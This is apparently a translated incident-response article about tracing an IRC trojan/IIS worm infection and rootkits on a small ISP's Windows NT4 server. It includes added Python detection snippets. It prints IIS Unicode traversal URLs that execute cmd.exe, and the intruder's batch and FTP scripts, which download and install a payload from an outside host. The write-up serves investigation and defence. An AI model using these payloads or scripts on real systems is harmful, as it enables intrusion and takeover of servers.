IRC Trojan/IIS Worm - Mini Internet Service Provider (ISP)

This document describes a client's network that had been compromised by hackers in several ways. The client's T1 Internet connection had slowed down unexpectedly, and they were worried their system might be infected with a virus or worm, as they had experienced this before. On investigation, the network was found to be infected not only with digital worms but was also being used as a warez server by various hackers, in particular through a new type of IRC worm called Total Kill. Because the client ran a small mini Internet service provider, giving friends and family occasional Internet access, many untrustworthy people had been able to configure the network, leaving it open to compromise.

Uploaded by

api-3777069
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
84 views6 pages

IRC Trojan/IIS Worm - Mini Internet Service Provider (ISP)

This document discusses a client's computer network that had been compromised by hackers in several ways: 1. The client's T1 internet connection had slowed down unexpectedly and they were worried their system may be infected with a virus or worm, as they had experienced this issue before. 2. Upon investigating, the client's network was found to be infected not just with digital worms, but was being used as a warez server by various hackers, including through a new type of IRC-worm called Total Kill. 3. As the client ran a small mini internet service provider business, allowing friends and family occasional internet access, many untrustworthy people had access to configure the network, leaving it vulnerable to compromise

Uploaded by

api-3777069
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 6

Confronting All Kinds of Hackers



Prepared by: Amirhossein Sharifi

The story began when one of my relatives, who is also a close customer of mine, ran into an Internet problem. In particular, he was surprised that his T1 line had inexplicably slowed down, and he was worried that his system might have caught a virus or an Internet worm, especially since he had once had this problem in the past. I told him I would take a look at his system.

Given his earlier problem, I expected that his system had probably been hit by a virus or worm again and that, with a little guidance and a few simple suggestions, he would be able to remove it himself. But contrary to what I imagined, this assumption turned out to be a single straw in a mountain of problems he was facing. My customer's network was not only infected with digital worms; it was being used as a Warez server by all sorts of hackers, in particular by means of a new strain of IRC Trojan/IIS worm [1] called Total Kill.

The Customer

This customer of mine was one of those people who run a small business and have no need for a full leased line. Instead, they use this line to provide part-time Internet service to a number of their friends and relatives as well. As a result, his network had passed through the hands of many people with some know-how; over these two years it had been maintained by his own staff, and any of them could add to or remove from his network's layout and configuration whenever they wanted. That is how my dear friend's network had turned into a mini Internet Service Provider [2].

[1] IRC Trojan/IIS worm
[2] Mini Internet Service Provider (ISP)

www.websecuritymgz.com

For his ISP business he had bought a T1 line and a large number of IP addresses, along with the equipment to manage them. So that these IP addresses would not go to waste, one of his previous administrators had set up a Cisco router and a DHCP server and had assigned each internal computer its own IP address, reachable from the Internet.

At the core of this network was one computer that hosted a large group of services. It ran Windows NT4 and acted as DNS server, DHCP server, Exchange server, primary domain controller [3] and file server. This server also hosted his company's database application. Because of the many services this computer offered, it could be a prime target for viruses and worms. In fact, five months before this, the server had already been attacked by Nimda.

List 1: nmap output on the customer's main server

Starting nmap V 2.54BETA22 (www.insecure.org/nmap)
Interesting ports on (192.168.0.66):
(The ports scanned but not shown below are in state: closed)
Port      State     Service
53/tcp    open      domain
80/tcp    open      http
135/tcp   open      loc-srv
137/tcp   filtered  netbios-ns
138/tcp   filtered  netbios-dgm
139/tcp   filtered  netbios-ssn
593/tcp   open      http-rpc-epmap
1029/tcp  open      unknown
1031/tcp  open      iad2
1035/tcp  open      unknown
1038/tcp  open      unknown
1042/tcp  open      unknown
1490/tcp  open      unknown

Initial Investigation, Day One, Afternoon


The first thing I had to do was find out the state of the system. In other words, I was looking for open ports on the system that could reveal the presence of an extra service or a Trojan. The best tool for this job is Nmap, so I installed a copy and scanned every port from 1 to 65535 on the IP addresses present on the network. The command I used looked like this:

[3] Primary domain controller


nmap -sS -p 1-65535 -O 192.168.x.x

As soon as Nmap finished its probe, I quickly went through the output, looking for anything suspicious or for well-known ports, for example 23, 21, 12345 and 31337, or anything else that would indicate an extra service or the port of a well-known Trojan. All of the computers answered on ports 135 to 139, which indicated NetBIOS and its possible shares. Port 80 on the customer's main server was also open (see List 1).
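The triage described above, as an added example that is not part of the original article: it parses the List 1 nmap table (re-typed here) and sorts each open port into the baseline expected for this server's documented roles, the well-known trojan ports the author names, or an unexplained port that needs a closer look. The baseline set is an assumption derived from the roles the article lists, not something the article states.

```python
import re

# Constructed sample: the nmap 2.54BETA22 listing from List 1, re-typed here.
NMAP_OUTPUT = """\
Starting nmap V 2.54BETA22 (www.insecure.org/nmap)
Interesting ports on (192.168.0.66):
(The ports scanned but not shown below are in state: closed)
Port      State     Service
53/tcp    open      domain
80/tcp    open      http
135/tcp   open      loc-srv
137/tcp   filtered  netbios-ns
138/tcp   filtered  netbios-dgm
139/tcp   filtered  netbios-ssn
593/tcp   open      http-rpc-epmap
1029/tcp  open      unknown
1031/tcp  open      iad2
1035/tcp  open      unknown
1038/tcp  open      unknown
1042/tcp  open      unknown
1490/tcp  open      unknown
"""

# Baseline for this host's documented roles (assumption): DNS, IIS, NT4 RPC/NetBIOS.
EXPECTED = {53, 80, 135, 137, 138, 139}
# Ports the article names as worth a second look: ftp, telnet and two classic back doors.
TROJAN_PORTS = {21: "ftp", 23: "telnet", 12345: "NetBus", 31337: "Back Orifice"}

PORT_RE = re.compile(r"^\s*(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

def parse_nmap(text):
    """Return [(port, proto, state, service)] from a classic nmap port table."""
    rows = (PORT_RE.match(line) for line in text.splitlines())
    return [(int(m[1]), m[2], m[3], m[4]) for m in rows if m]

def triage(text, expected=EXPECTED):
    """Sort open ports into expected, known trojan port, or unexplained (needs a look)."""
    findings = {"expected": [], "trojan": [], "unexplained": []}
    for port, _proto, state, service in parse_nmap(text):
        if state != "open":
            continue                      # filtered/closed ports are not listening
        if port in TROJAN_PORTS:
            findings["trojan"].append((port, TROJAN_PORTS[port]))
        elif port in expected:
            findings["expected"].append(port)
        else:
            findings["unexplained"].append((port, service))
    return findings
```

On the List 1 data every port from 593 upward lands in the unexplained bucket, which is exactly the set an administrator of this server could not account for.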

After I noticed that port 80 was open, I immediately opened my browser to see what web pages were hosted on this server. Port 80 is normally used by a web server, and I saw the pages that are present by default when IIS has been installed.

The next step was to search the server for the security weaknesses it had, so I ran my favourite scanners [4] and went downstairs for a drink.

When I came back, the results were upsetting! I found a very large number of weaknesses and security holes, including the Unicode ones! In other words, the smallest weakness in the server can help an intruder or an Internet worm get into it, and the Unicode weaknesses are among the oldest of these security holes! This showed that the people responsible for the network had not applied a single one of the patches that fix this kind of weakness.

Testing the Server's Weaknesses, Night One


One good thing was that I knew where to start my search. I began with the URL below. With this URL I instructed the server to display the listing of the c:\winnt\system32 directory:

[4] Whisker, Stealth, CGI4


http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?c+dir+c:\winnt\system32

The server returned the result at once.


A quick glance at the listing brought a number of suspicious files to my attention. I will list some of these files here and explain why they were suspicious. Unfortunately, many network administrators pay no attention whatsoever to suspicious files like these!

• PipeCmd.exe: a remote-control tool that runs on the client side and is used by intruders.
• Omnithread_tr.dll: one of the three files used to install VNC, a well-known and powerful remote-control tool.
• VNCHooks.dll: the second file needed to install VNC.
• Vnsystask.exe: the third file needed to install VNC; all of these were hidden from the user's view.
• Nc.exe: Netcat, the general-purpose tool for running commands remotely.
• Pw.exe: usually known as pwdump(2).exe, a program for extracting user names and their passwords.
• Samdump.dll: a file required by the pw.exe program.

Clearly, not one but two rootkits had been installed in the c:\winnt\system32 directory on this server. And as I found out later, this was only one of the dozens of rootkits that were competing with each other to take control of this server!!!

For example, the SysStat directory inside c:\winnt\system32, created on 7 October 2002, contained yet another rootkit.

Next, to see whether any other file in the server's root drive would catch my eye, I used another URL to display drive C. I think that with a little insight you can guess which URL I used:

http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?c+dir+c:\
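A detection counterpart to the two URLs above, added here as an example and not part of the original article: it runs over a few constructed IIS-style log lines, percent-decodes the request path repeatedly (so the double-encoded `%255c` form is caught as well as the `%5c` form shown in the article), and flags any request that climbs above its virtual directory or reaches a system executable such as cmd.exe. The log field layout and the list of sensitive executables are assumptions for the example.

```python
from urllib.parse import unquote

# Constructed IIS-style log lines (assumed fields: time, client ip, method, uri-stem,
# uri-query, status). The two 10.0.0.9 requests mirror the MSADC traversal form above.
LOG_LINES = [
    "14:02:11 10.0.0.5 GET /default.htm - 200",
    "14:03:40 10.0.0.9 GET /MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\\winnt\\system32 200",
    "14:04:02 10.0.0.9 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir+c:\\ 200",
    "14:05:15 10.0.0.7 GET /images/logo.gif - 304",
]

# Executables that should never be reachable through a web virtual directory (assumed list).
SENSITIVE = ("cmd.exe", "root.exe", "tftp.exe", "ftp.exe")

def decode_fully(s, rounds=3):
    """Percent-decode repeatedly so '%255c' -> '%5c' -> '\\' (double encoding)."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s

def escapes_webroot(uri_stem):
    """True if the decoded path climbs above the virtual directory it starts in."""
    path = decode_fully(uri_stem).replace("\\", "/")   # IIS treats \ like /
    depth = 0
    for part in path.split("/"):
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        elif part and part != ".":
            depth += 1
    return False

def scan(lines):
    """Return (time, client, reason) for each request matching the traversal pattern."""
    hits = []
    for line in lines:
        t, client, _method, stem = line.split(" ", 5)[:4]
        reasons = []
        if escapes_webroot(stem):
            reasons.append("traversal")
        if decode_fully(stem).lower().endswith(SENSITIVE):
            reasons.append("system executable")
        if reasons:
            hits.append((t, client, "+".join(reasons)))
    return hits
```

A normal relative path such as /images/../logo.gif never drops below the root and is not flagged, so the check keys on escaping the directory, not on the mere presence of "..".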


Listing of the server's drive C

Volume in drive C has no label
Volume Serial Number is DCF0-5460
Directory of C:

10/10/02 01:03p 1,000,000 1mb
05/20/02 09:32a 0 AUTOEXEC.BAT
10/18/02 12:57a 789 bootobc.dll
10/10/02 12:42p 223 CDIR.TXT
05/20/02 09:32a 0 CONFIG.SYS
10/30/02 05:53p 0 dir.txt
11/23/99 10:04a 208,144 dns.exe
06/07/02 11:04a 524,288 errorlog.evt
05/28/02 07:06p <DIR> exchsrvr
10/04/02 06:38p 0 explorer.exe
10/04/02 06:38p 0 explorer.ini
05/20/02 10:18p <DIR> hpfonts
09/24/02 06:49p <DIR> hplj2100
09/29/02 01:03p 6,721,536 httpodbc.dll
09/27/02 09:36p <DIR> IIStmp
10/18/02 01:11a <DIR> InetPub
10/10/02 12:45p 6,656 INFUSE.EXE
10/10/02 12:43p 602 LOGIN.TXT
10/02/02 02:17p 59,392 ncx99.exe
10/30/02 02:47p 6,693 netstat.txt
10/30/02 10:09a 536,870,912 pagefile.sys
07/24/02 01:29p <DIR> Program Files
10/10/02 12:44p 81 pt.txt
10/14/02 05:21a 1,307 ra_slave.log
10/26/02 01:21p 716 Script.bat
10/26/02 01:21p 95 Script.txt
10/29/02 07:42p 1,949 servudaemon.ini
10/28/02 04:40p 528 ServUStartUpLog.txt
10/04/02 04:25p 15,000,000 SR.CD2-H2O.r41
09/28/02 01:33p <DIR> TEMP
10/10/02 12:43p 17,920 TLIST.EXE
06/18/02 10:00p <DIR> veritas
09/28/02 01:18p <DIR> WIN32
10/10/02 12:45p 496,836 WINMGNT.EXE
10/30/02 01:09p <DIR> WINNT
35 File(s) 560,918,667 bytes

That was the point where I had to laugh: I had set out to see which area was infected, but two files in the root drive caught my eye: Script.bat and Script.txt, which very blatantly announced "I was created by an intruder". I decided to examine their contents. For this I used the following URLs, which display the contents of these files:

http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+type+c:\scripts.bat

http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+type+c:\scripts.txt

Have a look at the contents of these files yourself. What conclusion do you draw? What has happened on the server? In your opinion, what should I do next?


Contents of the Script.bat file


Mkdir c:\recycler
Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117
Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash
Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash\old_files
Mkdir d:\recycler
Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117
Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash
Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash\old_files
mkdir e:\recycler
Mkdir e:\recycler\S-1-5-21-1831738385-770969707-784038887-1117
Mkdir e:\recycler\S-1-5-21-1831738385-770969707-784
c:\winnt\system32\ftp -n -s:script.txt
c:\winnt\system32\svhost.exe /i
c:\winnt\system32\psshutdown.exe -r -l -f

Contents of the Script.txt file


open 210.171.xxx.xxx:11515
USER ironfredh
hichic
get svhost.exe
get servudaemon.ini
quit
